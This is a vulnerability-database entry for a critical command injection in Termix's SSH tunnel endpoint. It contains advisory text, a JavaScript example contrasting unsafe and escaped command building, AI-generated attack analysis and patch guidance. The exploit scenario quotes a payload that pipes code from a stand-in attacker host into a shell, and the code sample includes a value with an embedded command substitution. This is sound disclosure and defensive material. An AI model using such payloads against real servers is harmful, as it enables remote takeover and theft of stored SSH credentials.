
Termix CVE-2026-45748

EUVD-2026-34876 · CRITICAL
OS Command Injection (CWE-78)
2026-06-05 · GitHub_M
CVSS 3.1: 9.8 (GitHub Advisory)

Severity by source

GitHub Advisory (primary): 9.8 CRITICAL, AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: None
  • Scope: Unchanged
  • Confidentiality: High
  • Integrity: High
  • Availability: High

Lifecycle Timeline (3 events)

  • Patch available: Jun 05, 2026 - 20:02 (EUVD)
  • Source Code Evidence Fetched: Jun 05, 2026 - 18:37 (vuln.today)
  • Analysis Generated: Jun 05, 2026 - 18:37 (vuln.today)

Description (GitHub Advisory)

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. The POST /ssh/tunnel/connect endpoint in Termix prior to version 2.3.2 builds an SSH tunnel command by interpolating user-controlled host record fields (endpointIP, endpointUsername, password) directly into a shell command without escaping, allowing persistent OS command injection on the source SSH host. Version 2.3.2 patches the issue.
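The pattern the description names, shown beside a hardened form, as an added example that is not Termix code. Only the field names endpointIP, endpointUsername and password come from the advisory; the command layout, the remotePort/localPort fields, the validation patterns and the sample values are assumptions made for illustration.

```javascript
// Added example. The command shape is an assumed stand-in for a tunnel
// invocation; it is not taken from the Termix code base.

// Before: host record fields are pasted into the shell string as-is, so any
// shell metacharacter in them is interpreted by the shell that runs the line.
function buildTunnelCommandUnsafe(h) {
  return `sshpass -p ${h.password} ssh -N -R ${h.remotePort}:localhost:${h.localPort} ` +
         `${h.endpointUsername}@${h.endpointIP}`;
}

// POSIX single-quote escaping: inside '...' only ' itself needs handling.
function shQuote(value) {
  return "'" + String(value).replace(/'/g, "'\\''") + "'";
}

// Allowlists (assumed policy). Both require a non-dash first character so the
// value can never be parsed as a command-line option either.
const HOST_RE = /^[A-Za-z0-9][A-Za-z0-9.:-]{0,254}$/; // hostname, IPv4, IPv6 literal
const USER_RE = /^[A-Za-z_][A-Za-z0-9._-]{0,31}$/;    // conservative login name

function toPort(p) {
  const n = Number(p);
  if (!Number.isInteger(n) || n < 1 || n > 65535) throw new Error("invalid port");
  return n;
}

// After: validate fields that have a known grammar, quote the one that does
// not (a password may legitimately contain any printable character).
function buildTunnelCommandSafe(h) {
  if (typeof h.endpointIP !== "string" || !HOST_RE.test(h.endpointIP))
    throw new Error("invalid endpointIP");
  if (typeof h.endpointUsername !== "string" || !USER_RE.test(h.endpointUsername))
    throw new Error("invalid endpointUsername");
  if (typeof h.password !== "string" || /[\0\r\n]/.test(h.password))
    throw new Error("invalid password");
  const forward = `${toPort(h.remotePort)}:localhost:${toPort(h.localPort)}`;
  const target = shQuote(`${h.endpointUsername}@${h.endpointIP}`);
  return ["sshpass", "-p", shQuote(h.password), "ssh", "-N", "-R", forward, target].join(" ");
}

// Constructed sample record: the password carries a quote and a substitution.
const sample = { endpointIP: "10.0.0.5", endpointUsername: "ops",
                 password: "pa'ss $(id)", remotePort: 8080, localPort: 80 };
console.log(buildTunnelCommandSafe(sample));
```

Quoting is needed wherever the command must travel as a single string, as with an SSH exec request; when the process is spawned locally, passing an argument array to an exec-style API avoids the shell altogether.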

Analysis (AI)

OS command injection in Termix web-based server management platform prior to version 2.3.2 allows remote unauthenticated attackers to execute arbitrary commands on the source SSH host via the POST /ssh/tunnel/connect endpoint. The flaw stems from user-controlled host record fields being interpolated directly into shell commands without escaping, yielding persistent code execution. …


Attack Chain (AI, derived)

Hypothetical attack flow derived from CVE metadata

  • Access: Discover exposed Termix instance
  • Delivery: Craft POST to /ssh/tunnel/connect with shell metacharacters in host fields
  • Exploit: Server interpolates payload into shell command
  • Execution: Injected command executes on Termix host
  • Impact: Steal stored SSH credentials and pivot to managed servers

Vulnerability Assessment (AI)

Exploitation: The attacker must be able to send an HTTP POST to the /ssh/tunnel/connect endpoint of a Termix instance running a version prior to 2.3.2, and must be able to supply or control the endpointIP, endpointUsername, or password fields of a host record consumed by that endpoint. …

Risk Assessment: The CVSS 9.8 score is justified by the vector AV:N/AC:L/PR:N/UI:N with full CIA impact: exploitation is network-reachable, low-complexity, requires no authentication per the vector, and yields RCE. …

Exploit Scenario: A remote attacker who can reach the Termix web service sends a POST request to /ssh/tunnel/connect with a host record whose endpointIP, endpointUsername, or password field embeds shell metacharacters such as '; curl attacker.tld/sh | sh #', causing the Termix server to execute the injected command on the host running Termix when it builds the SSH tunnel invocation. The result is persistent code execution on the Termix server itself (not on the remote SSH endpoint), giving the attacker a foothold from which to harvest stored SSH credentials for downstream hosts. …

Remediation: Vendor-released patch: upgrade to Termix 2.3.2 or later, available from https://github.com/Termix-SSH/Termix/releases/tag/release-2.3.2-tag for all supported platforms (Windows EXE/MSI, Linux DEB/AppImage, macOS DMG). …

Recommended Action (AI)

Within 24 hours: Identify all Termix instances in your environment, determine their current versions, and restrict external network access to any systems running versions prior to 2.3.2 if technically feasible. …


More in Termix

CVE-2025-59951 CRITICAL POC
9.1 Oct 01

Docker default credentials in Termix server management. PoC and patch available.

CVE-2026-22804 HIGH POC
8.0 Jan 12

Stored XSS in Termix File Manager (versions 1.7.0-1.9.0) allows attackers with SSH server access to execute arbitrary Ja

CVE-2026-45744 CRITICAL
9.9 Jun 05

Remote command execution in Termix web-based server management platform (versions prior to 2.3.2) allows any authenticat

CVE-2026-45746 CRITICAL
9.0 Jun 05

Cross-tenant remote code execution in Termix (web-based SSH/file management platform) prior to version 2.3.2 allows an a

CVE-2026-45750 CRITICAL
9.0 Jun 05

Command injection in Termix server management platform before version 2.3.2 allows authenticated users to execute arbitr

CVE-2026-42453 HIGH
8.7 May 08

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to v

CVE-2026-45749 HIGH
8.1 Jun 05

Authentication bypass of MFA in Termix versions prior to 2.3.2 allows an attacker who already holds a victim's account p

CVE-2026-45743 HIGH
8.1 Jun 05

Cross-tenant SSH session hijacking in Termix versions prior to 2.3.2 allows any authenticated user to fully control anot

CVE-2026-42452 HIGH
8.1 May 08

Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to v

CVE-2026-45745 HIGH
8.0 Jun 05

Machine-in-the-middle interception of HTTPS traffic in Termix Desktop (Electron) starting at version 1.7.0 allows attack
